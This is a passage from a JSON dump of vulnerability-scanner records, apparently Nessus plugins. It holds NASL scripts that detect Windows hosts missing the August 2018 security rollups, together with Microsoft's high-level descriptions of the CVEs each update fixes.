severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343898, 4343888])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n 
exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:53", "description": "The remote Windows host is missing security update 4343909.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377,\n CVE-2018-8387)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. 
In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. 
The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2018-8383)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8380,\n CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343909: Windows 10 Version 1803 and Windows Server Version 1803 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8387", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8383", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-8380", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", 
"CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343909.NASL", "href": "https://www.tenable.com/plugins/nessus/111692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111692);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0952\",\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8350\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8377\",\n \"CVE-2018-8380\",\n \"CVE-2018-8381\",\n \"CVE-2018-8383\",\n \"CVE-2018-8385\",\n \"CVE-2018-8387\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8390\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8399\",\n \"CVE-2018-8400\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\",\n \"CVE-2018-8414\"\n );\n script_xref(name:\"MSKB\", value:\"4343909\");\n script_xref(name:\"MSFT\", value:\"MS18-4343909\");\n\n script_name(english:\"KB4343909: Windows 10 Version 1803 and Windows Server Version 1803 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple 
vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343909.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377,\n CVE-2018-8387)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. 
In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. 
The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2018-8383)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8380,\n CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343909/windows-10-update-kb4343909\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3356f605\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343909 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343909');\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = 
hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343909])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:20:01", "description": "The remote Windows host is missing security update 4343899\nor cumulative update 4343900. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8342, CVE-2018-8343)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8396, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345,\n CVE-2018-8346)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8397)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. 
(CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
